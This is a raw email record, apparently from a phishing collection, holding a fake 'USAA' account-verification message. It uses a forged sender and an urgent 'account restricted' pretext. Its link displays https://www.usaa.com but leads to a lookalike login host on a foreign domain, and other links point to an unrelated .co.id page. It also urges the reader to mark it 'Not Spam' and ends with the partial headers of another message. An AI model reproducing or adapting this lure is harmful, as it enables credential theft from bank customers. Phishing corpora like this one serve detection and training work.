From: "USAA" <codewizard@approject.com>
To: jose@monkey.org
Subject: Your USAA Checking/Savings Account Urgent Profile Update
Date: 06 Mar 2016 01:34:55 -0500
Message-ID: <20160306013455.2C0B7DAFF5B70089@approject.com>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_7984B61F.CF7FD3AB"
Status: O
X-Status: 
X-Keywords:                  
X-UID: 102


------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<div id=3D"_aolWebSuiteMsgBody" class=3D"msgBody" >
<div id=3D"AOLMsgPart_0_e5a7d576-01e2-45af-b976-04c8b38ee6b2">
<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"650" bgcol=
or=3D"#b5d7e6">
  <tr>
    <td height=3D"35" valign=3D"center" width=3D"650" align=3D"middle">
    <font style=3D"color: #929292; font-size: 9px" face=3D"Verdana, sans-se=
rif">To=20
    ensure delivery to your inbox, please add <span style=3D"color: #68a7c5=
">
    <a href=3D'mailto:USAA.Web.Services@customermail.usaa.com'>USAA.Web.Ser=
vices@customermail.usaa.com</a></span> to your address book.</font></td>
    <td>&nbsp;</td>
  </tr>
</table>
<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"650" bgcol=
or=3D"#b5d7e6">
  <tr>
    <td width=3D"10">&nbsp;</td>
    <td bgcolor=3D"white" width=3D"630" align=3D"middle">
    <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"604">
      <tr>
        <td height=3D"5" colspan=3D"4"></td>
      </tr>
      <tr>
        <td height=3D"45" width=3D"54">
        <a target=3D_blank href=3D"http://arifindo.co.id/images/uau.htm" re=
l=3D"nofollow">
        <img border=3D"0" alt=3D"" src=3D"cid:emaillogo.gif" width=3D"61" h=
eight=3D"41"></a></td>
        <td>
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0">
          <tr>
            <td style=3D"font-variant: normal; font-style: normal; font-fam=
ily: Arial, sans-serif; color: #6d6d6d; font-size: 16px; font-weight: bold"=
 height=3D"22" align=3D"left">
            <span style=3D"display: block; margin-top: 9px">Account Verific=
ation Notice</span></td>
          </tr>
          <tr>
            <td height=3D"23" nowrap=3D"" align=3D"left">
            <font size=3D"1" face=3D"Verdana, sans-serif">
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            View Accounts</a> |
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            Privacy Promise</a> |
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            Contact Us</a></font></td>
          </tr>
        </table>
        </td>
        <td height=3D"45" valign=3D"center" width=3D"367" align=3D"right">
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"18=
8" height=3D"65">
          <tr>
            <td width=3D"22">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=
=3D"22" height=3D"65">
              <tr>
                <td style=3D"line-height: 0" height=3D"29" valign=3D"top" w=
idth=3D"8">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec1-1.gif" width=3D"8" height=3D"29"></td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
29" valign=3D"top" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec1-2.gif" width=3D"14" height=3D"29"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" height=3D"29" valign=3D"top" w=
idth=3D"8">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsecspacer.gif" width=3D"8" height=3D"29"></td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
29" valign=3D"top" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsecspacer.gif" width=3D"14" height=3D"29"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" height=3D"7" valign=3D"bottom"=
 width=3D"8">
                </td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"bottom" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec2-1.gif" width=3D"14" height=3D"7"></td>
              </tr>
            </table>
            </td>
            <td bgcolor=3D"#e7e7e8" align=3D"left">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"5" width=
=3D"100%" height=3D"65">
              <tr>
                <td style=3D"text-align: left; line-height: 12px; font-size=
: 9px" valign=3D"center" align=3D"left">
                <font style=3D"color: rgb(0,54,91); font-size: 10px" face=
=3D"Arial, Helvetica, sans-serif">
                <strong>USAA SECURITY ZONE</strong></font> <br>
                <font color=3D"#00365b" face=3D"Arial, Helvetica, sans-seri=
f">ONLINE</font>
                <br>
                <font style=3D"color: rgb(0,54,91); font-size: 9px" face=3D=
"Arial, Helvetica, sans-serif">
                MEMBER</font> <br>
                <font style=3D"color: rgb(0,54,91); font-size: 9px" face=3D=
"Arial, Helvetica, sans-serif">
                USAA # ending in: XXXX</font></td>
              </tr>
            </table>
            </td>
            <td bgcolor=3D"#ffffff" width=3D"7">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=
=3D"7" height=3D"65">
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"top" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec1-3.gif" width=3D"7" height=3D"7"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
51" valign=3D"top" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsecspacer.gif" width=3D"7" height=3D"51"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"bottom" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
cid:emailsec2-2.gif" width=3D"7" height=3D"7"></td>
              </tr>
            </table>
            </td>
          </tr>
        </table>
        </td>
      </tr>
      <tr>
        <td height=3D"20" colspan=3D"4">&nbsp;</td>
      </tr>
      <tr>
        <td height=3D"1" colspan=3D"4"></td>
      </tr>
    </table>
    <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"95%">
      <tr>
        <td width=3D"95%" align=3D"left">
        <font style=3D"line-height: 18px; color: #333333; font-size: 12px" =
face=3D"Verdana, sans-serif">
        <font style=3D"line-height: 18px; color: rgb(51,51,51); font-size: =
12px" face=3D"Verdana, sans-serif">
        Dear Customer,
        <p class=3D"aolmail_first"><span class=3D"aolmail_bold"></span>For =
security reasons your online account has been temporarily restricted for ve=
rification, we are=20

verifying and confirming our customers emails on our database to make sure =
their account has not been compromised and that they are still getting mess=
ages from usaa in=20

order to prevent fraud and identity theft.</a>
       <p>Login here <a href=3D"http://usaa.com-sec-inet-auth-logon-ent-log=
on-logon-renb.imperialinhouse.com.au/nmjinet-logon-ent-logon-logon-redirect=
jsp-true/USAA%20_

%20Welcome%20to%20USAA.htm" target=3D"_blank">https://www.usaa.com</a> to c=
omplete your verification</p>
       <p>Note: Some unpleasant mail providers put our messages into spam c=
ause of swindlers phishing activity.
Help us to improve your mail provider by clicking "Not Spam" on our message=
 and use Mozilla Firefox browser for your safety. <p>Thank you,<br>
        USAA<br>
        &nbsp;</font></td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height=3D"30" colspan=3D"2" align=3D"left"><br>
        <a target=3D_blank href=3D"http://arifindo.co.id/images/uau.htm" re=
l=3D"nofollow">
        <img border=3D"0" alt=3D"Facebook" src=3D"http://content.usaa.com/m=
content/static_assets/om/Media/thumbnails/facebookIcon.gif" width=3D"32" he=
ight=3D"32"></a>&nbsp;&nbsp;<a target=3D_blank href=3D"http://arifindo.co.i=
d/images/uau.htm" rel=3D"nofollow"><img border=3D"0" alt=3D"Twitter" src=3D=
"http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitter=
Icon.gif" width=3D"32" height=3D"32"></a></td>
      </tr>
    </table>
    </td>
    <td width=3D"5">&nbsp;</td>
    <td width=3D"5">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"5" width=3D"10">&nbsp;</td>
    <td height=3D"5" width=3D"630">&nbsp;</td>
    <td height=3D"5" width=3D"5">&nbsp;</td>
    <td height=3D"5" width=3D"5">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"20" colspan=3D"4">&nbsp;</td>
  </tr>
  <tr>
    <td colspan=3D"4" align=3D"middle">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    Please do not reply to this e-mail. To send a secure message to USAA, p=
lease
    <a style=3D"color: #408cb0; text-decoration: none" target=3D_blank href=
=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
    contact us</a>.<br>
    <br>
    <a style=3D"color: #6d6d6d" target=3D_blank href=3D"http://arifindo.co.=
id/images/uau.htm" rel=3D"nofollow">
    Privacy Promise</a><br>
    USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<br>
    &nbsp;</font></td>
  </tr>
  <tr>
    <td height=3D"15" width=3D"10">&nbsp;</td>
  </tr>
  <tr>
    <td width=3D"5" align=3D"left">&nbsp;</td>
    <td width=3D"630" colspan=3D"2" align=3D"left">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    USAA means United Services Automobile Association and its insurance,=20=

    banking, investment and other companies. Banks Member FDIC. Investments=
=20
    provided by USAA Investment Management Company and USAA Financial Advis=
ors=20
    Inc., both registered broker dealers.</font></td>
    <td width=3D"5" align=3D"left">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"15" width=3D"10">&nbsp;</td>
  </tr>
  <tr>
    <td colspan=3D"4" align=3D"right">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    67624-1212&nbsp;&nbsp;&nbsp;</font><br>
    &nbsp;</td>
  </tr>
</table>
------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emaillogo.gif"
Content-Transfer-Encoding: base64
Content-ID: <emaillogo.gif>

R0lGODlhPQApAOYAAEKFsUGEsFCOt8XZ54OvzHOlxY620ESGsf3+/vz9/pm91KXF2kiJs7fR
4W6iw02Mtcnc6LvT40uLtXanxmGZvoCty8DW5V2XvHWmxoSwzEqKtD+DsGqfwbTP4FqVu/f6
/L7V5D6Cr8jb6PD1+bjS4ubv9V+YvXKkxVSRuM3e6pS603iox+nx9omzztzo8KPE2bPO3+zz
997q8UeIsvP3+tPj7fT4+vD2+ViTucPY5mSbv+Ls83uqyK/M3pq+1eDr8p7B1+Pt9N3p8X2r
yZC40drn8EWHslOQuIaxzZy/1vb5+6jH29bk7kOGsZK40rbQ4Yq0z1uWu3+syq3K3WedwMfb
6K7L3avJ3EaHsmmewf7//0CDsPn7/NPi7XGjxFaSuaDC2KnI28ba59vo8GWcv6/L3s/g68Xa
5/P4+ujw9cvd6afG2qTE2bHN3/r8/dDg65e81NDh7G2hwt/q8mugwm+jxNnn7+ry9kuMtVeT
urvU4+70+KrI3DuBrjyBrv///yH5BAAAAAAALAAAAAA9ACkAAAf/gH+Cg4SFhocyLRmLAzt7
h5CRkpOQSH19fph+GkKUnp+UCFGXmH0ARxGgqpA3H5I7G5p9EjJKI6u4gwQSKD43kA1+fjoP
fhs7ucl/AcJ9Xw2HLcJhDpkLyrkAsn0OXYQIJsJCTsIABjHYqgYwCxfNIVAsgkHMDwkpDMJ+
AlMJ6Z4RCBgYsOCBpgdLEFgQ5uAPFxEZmvkho+bfJG3GDECQ1oyDHGEK/ijJssYCnVJ+KiCz
eMjIpUwIc1TTh2mAoBV9sliYcqTZDCA2WBbSUaFAiEwTQbRBoemAvD9hNGWAoIKZMA9PRgRJ
IfQNjAg5Jrz0I0WEggN+KGgRNOeLPgZA/8Ss0LcJwAShPftcaEDigiYjSapgaDEowRsFM5BG
4euO1AqhRpr1mTAADANNeaaUGISgABEIFSRTBiNBWAWhGgRoQBrACYSIzYIQUuAHRQ8QVFg7
EdGhgQyhIlKoeWHwkoArIDjs40LoTDMHOcIIaCZhyIkMQicEYAAFgoEQpThYeGGg0A3lmlpA
ILKBJg+hAJBKWDDgBN0Kmwt1uYICKR76BZTiBXx09UFBBB3goIkZhiDBgwhwYJRWBCQgYUAN
QiUhRgPoCTNEFT4c0AQNhjTQBxaB8YCUHwVY8QIQQhHSAA76AADHeIf88JIHHURAwYp+PBbj
IDSEqAkKcRziRv9opRRAUGnC1DFkIXMMgRQIkVjQWEbr4WBCB1MacoYJfTwFyQdsrGbcCymI
YUGYhnwAghuUlIAEXeBhACc2ZnToh557KqNFgsJAEWg699SAwB8JxLAoNgQUkN8faxTwwx8j
KGDCFw6QMIgQBUihRCFPnMDGIDv4AAQYk+aSTxGDWFnDBz8+oMMBFwzCRCY2EZKEHzP88kcP
S1DwBAzYCNCHC7r4IUMOftAx6gg5PKoCJqcVRmYfegjSQw8FLFFGsss2+wMMfgxYyAdHABCA
BrcIEgewQQpihwIkGPCbMtMxKwgBfhTxgzAFcDXIAH4YgIEfngoizRUMNHGHIDSM4QrHuf7+
ATCGHUA5wVMqjlFGH4DSwIAAXFTTQ4zTdfKvHxj+wYIC+TigRQwA5BpDAE79EYEfIaErR4w0
eiPIwkwQwkQAIdDQhh8eqOBEZFb8Yd8EKkjRRwCysbQwAYsWgYUGNriAzh9FBNDECBz0McMW
PPtxQhoAhHDAFgBs4cc1LImQiQlexHeNCgecwAMWfqgwBtQ32IDGrhvMRQQaNtjwgh9R+MMS
bk0E4AEfggzgAQAb9JIADDpUrYsOFJCRcRpZUNHqoYEGAgA7

------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emailsec1-1.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec1-1.gif>

R0lGODlhCAAdALMAABBDZUBohN/m6q/AzGCCmc/Z4L/N1iBPcK27xStXdpCks3SPoufn6P//
/wA2WwAAACH5BAAAAAAALAAAAAAIAB0AQAQ+sMlJpQgua42aAJtTUVh4hAszGsToVkNIhI5C
pwWqSgOYvcDgpNDi+USfkIGWOIUQN0Z0tkk1ShteiHLJRAAAOw==

------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emailsec1-2.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec1-2.gif>

R0lGODlhDgAdAMQAAB1MbcrR1ld5kHSPog5BZJ+vvCtXdtnc37zGza27xfb29vz8/Ozs7O3t
7oKZqkhuh+np6Tpifv///+fn6AA2WwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ACH5BAAAAAAALAAAAAAOAB0AQAVzoCRKSjOd6Emt7BoFadJOQ2vfLAEraZ8+sEnAcIv4ThEb
ANACCBA+yQJyrFonuFYBRaQYazbBMWkb22RZwvYkWjCukvd1YppPmCxnwpelqFErBng2OicH
Aw4HB4MsCAgzYE1mZT5kM5VhfSxGmhRrWS8pIQA7

------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emailsecspacer.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsecspacer.gif>

R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==

------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emailsec2-1.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec2-1.gif>

R0lGODlhDgAHAKIAAOnp6e3t7vz8/Ozs7Pb29v///+fn6AAAACH5BAAAAAAALAAAAAAOAAcA
QAMUaLrMJaBJImu5hYRqNnfDt1xC+CUAOw==

------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emailsec1-3.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec1-3.gif>

R0lGODlhBwAHAKIAAOnp6e3t7vz8/Ozs7Pb29v///+fn6AAAACH5BAAAAAAALAAAAAAHAAcA
QAMRaEHVZTCSaIB4NI+L4+hRkAAAOw==

------=_NextPart_000_0012_7984B61F.CF7FD3AB
Content-Type: image/gif; name="emailsec2-2.gif"
Content-Transfer-Encoding: base64
Content-ID: <emailsec2-2.gif>

R0lGODlhBwAHAKIAAOnp6e3t7vz8/Ozs7Pb29v///+fn6AAAACH5BAAAAAAALAAAAAAHAAcA
QAMRaLpsIKUZYgIpOLbQhjYDVCQAOw==

------=_NextPart_000_0012_7984B61F.CF7FD3AB--

From jose@monkey.org Mon Mar  7 02:42:39 2016 +0000
Return-Path: bounces+2338044-3e2d-jose=monkey.org@sendgrid.net
Delivered-To: jose@monkey.org
X-FDA: 71265341238.12.ocean51_514c25b516815
Authentication-Results: auth.b.hostedemail.com; dkim=fail
	reason="verification failed; insecure key"
	header.d=sendgrid.net header.i=@sendgrid.net header.b=HHpzEu5m;
	dkim-adsp=none (insecure policy); dkim-atps=neutral
X-Spam-Summary: 9,0,0,,d41d8cd98f00b204,bounces+2338044-3e2d-jose=monkey.org@sendgrid.net,:,RULES_HIT:2539:30001:30003:30019:30022:30054:30055:30064:30067:30069:30070:30084,0,RBL:167.89.17.173:@sendgrid.net:.lbl8.mailshell.net-62.18.0.100 64.10.201.10,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:paypal-communication.com-tc.dbl.urbl.hostedemail.com-127.0.0.200,Custom_rules:0:2:0,LFtime:16,LUA_SUMMARY:none
X-HE-Tag: ocean51_514c25b516815
X-Filterd-Recvd-Size: 38483
Received: from o1678917x173.outbound-mail.sendgrid.net (o1678917x173.outbound-mail.sendgrid.net [167.89.17.173])
	by imf17.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  7 Mar 2016 02:42:38 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=sendgrid.net; 
	h=from:to:subject:mime-version:content-type; s=smtpapi; 
	bh=foWoNo3ZDK6dcOwV/d16FkG4+Fs=; b=HHpzEu5mxG/VEEMPOIhe7peT9v7Hu
	tQ0QxYroInQXJe18IJaQyCxNjOT9CD+AfD9WpPhqO28lo08flBf6pJ/1wXu/Hlml
	UlkSkj44b1W6RSx+SZld5LqF7CGDw/NLkt9gvpNBxq4AMUctPPuQVi34D4n+ff0s
	hTjXRerXHaUG0U=
Received: by filter0080p1las1.sendgrid.net with SMTP id filter0080p1las1.5116.56DCEA9C63
        2016-03-07 02:42:36.968154627 +0000 UTC
Received: from Nh4tL3ePC (subs06-103-10-65-116.three.co.id [103.10.65.116])
	by ismtpd0019p1sin1.sendgrid.net (SG) with ESMTP id tCOyjjWnRUi3RwhKEDS6Fg
	for <jose@monkey.org>; Mon, 07 Mar 2016 02:42:35.847 +0000 (UTC)
